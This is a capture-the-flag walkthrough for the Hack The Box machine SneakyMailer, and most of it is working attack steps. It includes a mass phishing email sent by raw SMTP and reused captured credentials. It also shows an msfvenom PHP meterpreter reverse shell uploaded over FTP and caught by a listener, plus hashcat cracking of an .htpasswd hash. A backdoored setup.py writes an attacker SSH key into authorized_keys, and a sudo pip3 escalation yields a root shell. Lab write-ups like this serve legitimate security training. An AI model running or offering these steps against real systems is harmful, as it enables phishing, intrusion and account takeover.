Hack the Box (HTB) – SneakyMailer

Other walkthrough: http://insec.in/2020/07/15/hack-the-box-sneakymailer-walkthrough/

Scanning

IP=10.10.10.197

nmap -T4 -sT -p 1-65535 $IP
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-21 17:40 EDT
Nmap scan report for 10.10.10.197
Host is up (0.098s latency).
Not shown: 65528 closed ports
PORT     STATE SERVICE
21/tcp   open  ftp
22/tcp   open  ssh
25/tcp   open  smtp
80/tcp   open  http
143/tcp  open  imap
993/tcp  open  imaps
8080/tcp open  http-proxy

Nmap done: 1 IP address (1 host up) scanned in 234.67 seconds

Nothing interesting from nmap scripts, or gobuster (hidden pages).

Solution for user low

http://10.10.10.197:8080/ returns a page for nginx
http://10.10.10.197:80 redirects to sneakycorp.htb

sneakycorp.htb MUST BE ADDED IN /etc/hosts

nano /etc/hosts

10.10.10.197   sneakycorp.htb

Go to http://sneakycorp.htb/team.php and keep note of email addresses.

We need a web server to display requests received so we will use Apache already installed on Kali Linux and ModSecurity to audit the requests. Network sniffing with Wireshark would have been faster…

apt install libapache2-mod-security2
mv /etc/modsecurity/modsecurity.conf-recommended /etc/modsecurity/modsecurity.conf
nano /etc/modsecurity/modsecurity.conf
Comment the rules and set
SecAuditEngine On
service apache2 reload

cat /var/log/apache2/modsec_audit.log

firstName=Paul&lastName=Byrd&email=paulbyrd%40sneakymailer.htb&password=%5E%28%23J%40SkFv2%5B%25KhIxKk%28Ju%60hqcHl%3C%3AHt&rpassword=%5E%28%23J%40SkFv2%5B%25KhIxKk%28Ju%60hqcHl%3C%3AHt

Need to send a phishing email (which was also a hint from the machine logo of a guy fishing…)

IP=10.10.10.197
nc -C $IP 25

HELO sneakycorp.htb
MAIL FROM:carastevens@sneakymailer.htb
RCPT TO:airisatou@sneakymailer.htb
RCPT TO:angelicaramos@sneakymailer.htb
RCPT TO:ashtoncox@sneakymailer.htb
RCPT TO:bradleygreer@sneakymailer.htb
RCPT TO:brendenwagner@sneakymailer.htb
RCPT TO:briellewilliamson@sneakymailer.htb
RCPT TO:brunonash@sneakymailer.htb
RCPT TO:caesarvance@sneakymailer.htb
RCPT TO:carastevens@sneakymailer.htb
RCPT TO:cedrickelly@sneakymailer.htb
RCPT TO:chardemarshall@sneakymailer.htb
RCPT TO:colleenhurst@sneakymailer.htb
RCPT TO:dairios@sneakymailer.htb
RCPT TO:donnasnider@sneakymailer.htb
RCPT TO:doriswilder@sneakymailer.htb
RCPT TO:finncamacho@sneakymailer.htb
RCPT TO:fionagreen@sneakymailer.htb
RCPT TO:garrettwinters@sneakymailer.htb
RCPT TO:gavincortez@sneakymailer.htb
RCPT TO:gavinjoyce@sneakymailer.htb
RCPT TO:glorialittle@sneakymailer.htb
RCPT TO:haleykennedy@sneakymailer.htb
RCPT TO:hermionebutler@sneakymailer.htb
RCPT TO:herrodchandler@sneakymailer.htb
RCPT TO:hopefuentes@sneakymailer.htb
RCPT TO:howardhatfield@sneakymailer.htb
RCPT TO:jacksonbradshaw@sneakymailer.htb
RCPT TO:jenagaines@sneakymailer.htb
RCPT TO:jenettecaldwell@sneakymailer.htb
RCPT TO:jenniferacosta@sneakymailer.htb
RCPT TO:jenniferchang@sneakymailer.htb
RCPT TO:jonasalexander@sneakymailer.htb
RCPT TO:laelgreer@sneakymailer.htb
RCPT TO:martenamccray@sneakymailer.htb
RCPT TO:michaelsilva@sneakymailer.htb
RCPT TO:michellehouse@sneakymailer.htb
RCPT TO:olivialiang@sneakymailer.htb
RCPT TO:paulbyrd@sneakymailer.htb
RCPT TO:prescottbartlett@sneakymailer.htb
RCPT TO:quinnflynn@sneakymailer.htb
RCPT TO:rhonadavidson@sneakymailer.htb
RCPT TO:sakurayamamoto@sneakymailer.htb
RCPT TO:sergebaldwin@sneakymailer.htb
RCPT TO:shaddecker@sneakymailer.htb
RCPT TO:shouitou@sneakymailer.htb
RCPT TO:sonyafrost@sneakymailer.htb
RCPT TO:sukiburks@sneakymailer.htb
RCPT TO:sulcud@sneakymailer.htb
RCPT TO:tatyanafitzpatrick@sneakymailer.htb
RCPT TO:thorwalton@sneakymailer.htb
RCPT TO:tigernixon@sneakymailer.htb
RCPT TO:timothymooney@sneakymailer.htb
RCPT TO:unitybutler@sneakymailer.htb
RCPT TO:vivianharrell@sneakymailer.htb
RCPT TO:yuriberry@sneakymailer.htb
RCPT TO:zenaidafrank@sneakymailer.htb
RCPT TO:zoritaserrano@sneakymailer.htb
DATA
From: carastevens@sneakymailer.htb
To: glorialittle@sneakymailer.htb
Date: Mon, 12 Apr 2020 14:21:26 -0400
Subject: Test Message

This is a phishing email
http://10.10.14.23:80/php_shell.php

.
QUIT


https://webhook.site/492afef8-9c67-455f-b2e6-9aa7afc88ced

250 2.0.0 Ok: queued as 540F724667

The POST request should appear in ModSecurity log.

cat /var/log/apache2/modsec_audit.log

firstName=Paul&lastName=Byrd&email=paulbyrd%40sneakymailer.htb&password=%5E%28%23J%40SkFv2%5B%25KhIxKk%28Ju%60hqcHl%3C%3AHt&rpassword=%5E%28%23J%40SkFv2%5B%25KhIxKk%28Ju%60hqcHl%3C%3AHt

Decode it online.

firstName=Paul&lastName=Byrd&email=paulbyrd@sneakymailer.htb&password=^(#J@SkFv2[%KhIxKk(Ju`hqcHl<:Ht&rpassword=^(#J@SkFv2[%KhIxKk(Ju`hqcHl<:Ht

PASSWORD FOUND: ^(#J@SkFv2[%KhIxKk(Ju`hqcHl<:Ht

READ EMAILS OF PAUL *** Install a mail client

apt-get install evolution
evolution

In tab Identity:
Email address: paulbyrd@sneakymailer.htb

In tab Receiving mail:
Server: 10.10.10.197
Username: paulbyrd@sneakymailer.htb

In tab Sending mail:
Server: 10.10.10.197

When prompted for password: ^(#J@SkFv2[%KhIxKk(Ju`hqcHl<:Ht&

In email:

Hello administrator, I want to change this password for the developer account

Username: developer
Original-Password: m^AsY7vTKVT+dV1{WOU%@NaHkUAId3]C

Please notify me when you do it

Found: Username: developer, password: m^AsY7vTKVT+dV1{WOU%@NaHkUAId3]C

Create a php reverse shell that will be uploaded using FTP

cd /root/htb

# Generate a reverse shell
KALI_IP=10.10.14.23
LISTENER_PORT=4444
msfvenom -p php/meterpreter/reverse_tcp LHOST=$KALI_IP LPORT=$LISTENER_PORT -f raw > php_shell.php

Log into the FTP using found credentials.

dev.sneakycorp.htb & pypi.sneakycorp.htb MUST BE ADDED IN /etc/hosts

ftp 10.10.10.197
developer
m^AsY7vTKVT+dV1{WOU%@NaHkUAId3]C
ls
   dev
cd dev
ls
put /root/htb/php_shell.php php_shell.php
ls

Start a listener

msfconsole
use exploit/multi/handler
set PAYLOAD php/meterpreter/reverse_tcp
set LHOST 10.10.14.23
set LPORT 4444
set ExitOnSession false
exploit -j -z

Visit http://dev.sneakycorp.htb/php_shell.php

sessions
sessions -i 1
shell
python -c 'import pty; pty.spawn("/bin/bash")'

whoami
www-data

su developer
m^AsY7vTKVT+dV1{WOU%@NaHkUAId3]C

cd /var/www
cd pypi.sneakycorp.htb

cat .htpasswd
pypi:$apr1$RV5c5YVs$U9.OTqF5n8K4mxWpSSR/p/

Hash to crack: $apr1$RV5c5YVs$U9.OTqF5n8K4mxWpSSR/p/

#hash type: 1600 | Apache $apr1$ MD5, md5apr1, MD5 (APR) | HTTP, SMTP, LDAP Server
HASH=/root/htb/hash.txt
TYPE=1600
WL=/usr/share/wordlists/rockyou.txt

hashcat -m $TYPE -a 0 $HASH $WL --force

# Show results
hashcat -m $TYPE $HASH --show

Password found: soufianeelhaoui

cat /etc/passwd | grep -v nologin
root:x:0:0:root:/root:/bin/bash
low:x:1000:1000:,,,:/home/low:/bin/bash
developer:x:1001:1001:,,,:/var/www/dev.sneakycorp.htb:/bin/bash

Visit http://pypi.sneakycorp.htb:8080/

Welcome to pypiserver!

This is a PyPI compatible package index serving 0 packages.

To use this server with pip, run the following command:

        pip install --index-url http://pypi.sneakycorp.htb/simple/ PACKAGE [PACKAGE2...]
      

To use this server with easy_install, run the following command:

        easy_install --index-url http://pypi.sneakycorp.htb/simple/ PACKAGE [PACKAGE2...]
      

The complete list of all packages can be found here or via the simple index.

This instance is running version 1.3.2 of the pypiserver software.

Create these files locally – nano and vi don’t work in the meterpreter session – will use upload them later

.pypirc

[distutils]
index-servers = local

[local]
repository: http://pypi.sneakycorp.htb:8080
username: pypi
password: soufianeelhaoui

Generate my key to add in authorized_hosts on the machine

# Generate a public/private key pair on kali
ssh-keygen -t rsa
[leave all default parameters]

cat id_rsa.pub
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC/jI0IQa8NCOb+d3FeNM+Wij++U4+rbSL5soOUZTYU6ccjO3kqWoE0rnvyAgI/iMNNb46yE4TEFNU+1ksJnU+Pt9j+z26WPJhLeOWRFvleGKu5I3XObZP2rLbL4Oro2g1+eAcByWfDkbBvYUkmdWtfo7R/ehyp6l4s4j4opPsS17dG/zzIR6xbVKPEz5ZaBxQdDw1pn630w7GsRwaWlSnAdDx+Sqsi2re3I3fW5S5QMRJS2xJeY+opMQWSgVpB457qRw6N3Mo6XfqxSPj6ufk4Ck2P/wlcGLi2G0JdyP0DM3Vh0H3zcP5wzyvPONldHQOss41oGP5TSCnyx/nYsB/CwZtlhJHGE+wn+/urnwKU555/4ojizwOrNriP7EQPXpTTiAZjTbLz3E8K19hM7sil1a+WSn8AyMKH9CSLsNScgtg2ibpPFR16Iw1GYYxL6/F4MmF4MtqY+7vTNW8/GWe30fplC1WJtUDazfTn66SY6yRZJvqrsRQMFNUNvSurFE0= root@kaliz

setup.py (put my RSA key)

import setuptools

try:
    with open("/home/low/.ssh/authorized_keys", "a") as f:
        f.write("\nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC/jI0IQa8NCOb+d3FeNM+Wij++U4+rbSL5soOUZTYU6ccjO3kqWoE0rnvyAgI/iMNNb46yE4TEFNU+1ksJnU+Pt9j+z26WPJhLeOWRFvleGKu5I3XObZP2rLbL4Oro2g1+eAcByWfDkbBvYUkmdWtfo7R/ehyp6l4s4j4opPsS17dG/zzIR6xbVKPEz5ZaBxQdDw1pn630w7GsRwaWlSnAdDx+Sqsi2re3I3fW5S5QMRJS2xJeY+opMQWSgVpB457qRw6N3Mo6XfqxSPj6ufk4Ck2P/wlcGLi2G0JdyP0DM3Vh0H3zcP5wzyvPONldHQOss41oGP5TSCnyx/nYsB/CwZtlhJHGE+wn+/urnwKU555/4ojizwOrNriP7EQPXpTTiAZjTbLz3E8K19hM7sil1a+WSn8AyMKH9CSLsNScgtg2ibpPFR16Iw1GYYxL6/F4MmF4MtqY+7vTNW8/GWe30fplC1WJtUDazfTn66SY6yRZJvqrsRQMFNUNvSurFE0= root@kaliz")
        f.close()
except Exception as e:
    pass
    setuptools.setup(
        name="root", # My username
        version="0.0.1",
        author="Example Author",
        author_email="author@example.com",
        description="A small example package",
        long_description="",
        long_description_content_type="text/markdown",
        url="https://github.com/pypa/sampleproject",
        packages=setuptools.find_packages(),
        classifiers=[
            "Programming Language :: Python :: 3",
            "License :: OSI Approved :: MIT License",
            "Operating System :: OS Independent",
        ],
    )

Using previous meterpreter session, upload the files

exit
exit
exit
# NOT IN A SHELL, IN METERPRETER SESSION
upload /root/htb/pkg/.pypirc /tmp/pkg/.pypirc
upload /root/htb/pkg/setup.py /tmp/pkg/setup.py

shell
python -c 'import pty; pty.spawn("/bin/bash")'
cd /tmp/pkg
chmod 777 .pypirc
chmod 777 setup.py

su developer
m^AsY7vTKVT+dV1{WOU%@NaHkUAId3]C

HOME=$(pwd)
python3 setup.py sdist register -r local upload -r local
<n3 setup.py sdist register -r local upload -r local

FINALLY connect to user low

cd .ssh
chmod 700 id_rsa
ssh -i id_rsa low@10.10.10.197
ls -la
cat user.txt
80b7d2332a737280abcd24c91bf2d826

80b7d2332a737280abcd24c91bf2d826

Solution for root user

Privilege escalation from user low to root

sudo -l

sudo: unable to resolve host sneakymailer: Temporary failure in name resolution
Matching Defaults entries for low on sneakymailer:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User low may run the following commands on sneakymailer:
    (root) NOPASSWD: /usr/bin/pip3

Use privilege escalation method for sudo on pip from gtfobins

TF=$(mktemp -d)
echo "import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')" > $TF/setup.py
sudo pip3 install $TF
cd
ls -la
cat root.txt
7b4ea607d20d73af3fb31026e8319e1a

7b4ea607d20d73af3fb31026e8319e1a